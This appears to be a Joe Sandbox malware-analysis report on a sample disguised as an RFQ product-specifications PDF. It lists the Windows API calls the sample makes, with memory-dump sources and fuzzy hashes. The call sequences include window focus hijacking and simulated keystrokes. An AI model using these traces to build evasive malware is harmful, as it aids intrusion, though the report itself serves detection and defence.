                                                                                                                  • Part of subcall function 00A44E90: FreeLibrary.KERNEL32(00000000,?,?,00A44EDD,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44EC0
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44EFD
                                                                                                                  • Part of subcall function 00A44E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A83CDE,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E62
                                                                                                                  • Part of subcall function 00A44E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A44E74
                                                                                                                  • Part of subcall function 00A44E59: FreeLibrary.KERNEL32(00000000,?,?,00A83CDE,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E87
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2632591731-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wsopen_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3347428461-0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00A41129,00000000,?,00A72E29,00000001,00000364,?,?,?,00A6F2DE,00A73863,00B11444,?,00A5FDF5,?), ref: 00A74CBE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44F6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                APIs
                                                                                                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00A8EE51,00B03630,00000002), ref: 00AACD26
                                                                                                                  • Part of subcall function 00AACC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00AACD19,?,?,?), ref: 00AACC59
                                                                                                                  • Part of subcall function 00AACC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00AACD19,?,?,?,?,00A8EE51,00B03630,00000002), ref: 00AACC6E
                                                                                                                  • Part of subcall function 00AACC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00AACD19,?,?,?,?,00A8EE51,00B03630,00000002), ref: 00AACC7A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Pointer$Write
                                                                                                                • String ID:
                                                                                                                • API String ID: 3847668363-0
                                                                                                                APIs
                                                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A42DC4
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongNamePath_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 541455249-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A43908
                                                                                                                  • Part of subcall function 00A4D730: GetInputState.USER32 ref: 00A4D807
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A42B6B
                                                                                                                  • Part of subcall function 00A430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A4314E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                • String ID:
                                                                                                                • API String ID: 3667716007-0
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00A80704,?,?,00000000,?,00A80704,00000000,0000000C), ref: 00A803B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00A41CBC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoParametersSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3098949447-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A45745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00A4949C,?,00008000), ref: 00A45773
                                                                                                                • GetLastError.KERNEL32(00000002,00000000), ref: 00AB76DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1214770103-0
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(?,?,00000000,00A824E0), ref: 00A46266
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0141DF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00AD961A
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AD965B
                                                                                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00AD969F
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AD96C9
                                                                                                                • SendMessageW.USER32 ref: 00AD96F2
                                                                                                                • GetKeyState.USER32(00000011), ref: 00AD978B
                                                                                                                • GetKeyState.USER32(00000009), ref: 00AD9798
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AD97AE
                                                                                                                • GetKeyState.USER32(00000010), ref: 00AD97B8
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AD97E9
                                                                                                                • SendMessageW.USER32 ref: 00AD9810
                                                                                                                • SendMessageW.USER32(?,00001030,?,00AD7E95), ref: 00AD9918
                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00AD992E
                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00AD9941
                                                                                                                • SetCapture.USER32(?), ref: 00AD994A
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00AD99AF
                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00AD99BC
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AD99D6
                                                                                                                • ReleaseCapture.USER32 ref: 00AD99E1
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD9A19
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AD9A26
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AD9A80
                                                                                                                • SendMessageW.USER32 ref: 00AD9AAE
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AD9AEB
                                                                                                                • SendMessageW.USER32 ref: 00AD9B1A
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AD9B3B
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AD9B4A
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD9B68
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AD9B75
                                                                                                                • GetParent.USER32(?), ref: 00AD9B93
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AD9BFA
                                                                                                                • SendMessageW.USER32 ref: 00AD9C2B
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00AD9C84
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AD9CB4
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AD9CDE
                                                                                                                • SendMessageW.USER32 ref: 00AD9D01
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00AD9D4E
                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AD9D82
                                                                                                                  • Part of subcall function 00A59944: GetWindowLongW.USER32(?,000000EB), ref: 00A59952
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD9E05
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                • API String ID: 3429851547-4164748364
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00AD48F3
                                                                                                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00AD4908
                                                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00AD4927
                                                                                                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00AD494B
                                                                                                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00AD495C
                                                                                                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00AD497B
                                                                                                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00AD49AE
                                                                                                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00AD49D4
                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00AD4A0F
                                                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00AD4A56
                                                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00AD4A7E
                                                                                                                • IsMenu.USER32(?), ref: 00AD4A97
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AD4AF2
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AD4B20
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD4B94
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00AD4BE3
                                                                                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00AD4C82
                                                                                                                • wsprintfW.USER32 ref: 00AD4CAE
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AD4CC9
                                                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 00AD4CF1
                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AD4D13
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AD4D33
                                                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 00AD4D5A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 4054740463-328681919
                                                                                                                • Opcode ID: d0c75173acc70307c790effa008a1f8ca3fac9316b4370ed0a1ef5c76a96600d
                                                                                                                • Instruction ID: c4e1f26fa5c9058bf33355f0265ed14d2a133cac0d932591d9c50f4f2c38effc
                                                                                                                • Opcode Fuzzy Hash: d0c75173acc70307c790effa008a1f8ca3fac9316b4370ed0a1ef5c76a96600d
                                                                                                                • Instruction Fuzzy Hash: 6D12DE71600255ABEB258F68CC49FAE7BF8EF49710F10412AF917EB2E1DB789941CB50
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00A5F998
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A9F474
                                                                                                                • IsIconic.USER32(00000000), ref: 00A9F47D
                                                                                                                • ShowWindow.USER32(00000000,00000009), ref: 00A9F48A
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A9F494
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A9F4AA
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A9F4B1
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A9F4BD
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A9F4CE
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A9F4D6
                                                                                                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00A9F4DE
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A9F4E1
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F4F6
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A9F501
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F50B
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A9F510
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F519
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A9F51E
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F528
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A9F52D
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A9F530
                                                                                                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00A9F557
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
